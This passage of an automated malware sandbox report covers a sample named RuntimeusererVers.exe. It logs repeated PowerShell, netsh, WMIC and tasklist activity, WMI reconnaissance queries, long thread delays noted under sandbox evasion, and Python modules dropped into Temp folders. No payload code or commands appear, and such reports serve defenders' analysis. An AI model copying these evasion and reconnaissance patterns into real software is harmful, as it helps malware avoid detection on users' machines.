                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeWindow / User API: threadDelayed 545Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeWindow / User API: threadDelayed 9422Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3412Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 662Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4388
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4081
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pyexpat.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\_cffi.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ctypes.pydJump to dropped file
